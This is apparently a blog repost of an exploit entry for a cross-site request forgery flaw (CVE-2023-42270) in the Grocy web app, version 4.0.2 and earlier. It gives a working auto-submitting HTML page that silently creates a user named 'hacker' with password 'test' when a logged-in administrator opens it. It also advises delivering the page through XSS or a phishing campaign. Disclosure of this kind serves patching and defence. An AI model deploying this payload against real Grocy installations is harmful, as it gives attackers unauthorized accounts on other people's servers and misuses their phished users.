Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86381412

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

Grocy <=4.0.2 - CSRF

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270



Overview
==================================================
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format. 
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.



Proof of Concept
==================================================
Host the following html code via a XSS or delivery via a phishing campaign:

	<html>
	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
	<input name='username' value='hacker' type='hidden'>
	<input name='password' value='test' type='hidden'>
	<input type=submit>
	</form>
	<script>
	history.pushState('','', '/');
	document.forms[0].submit();
	</script>
	</html>


If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials

	Username: hacker
	Password: test

Note:
In order for this to work, the target must have Create User Permissions.
This is enabled by default.



Proof of Exploit/Reproduce
==================================================
http://xploit.sh/posts/cve-2023-42270/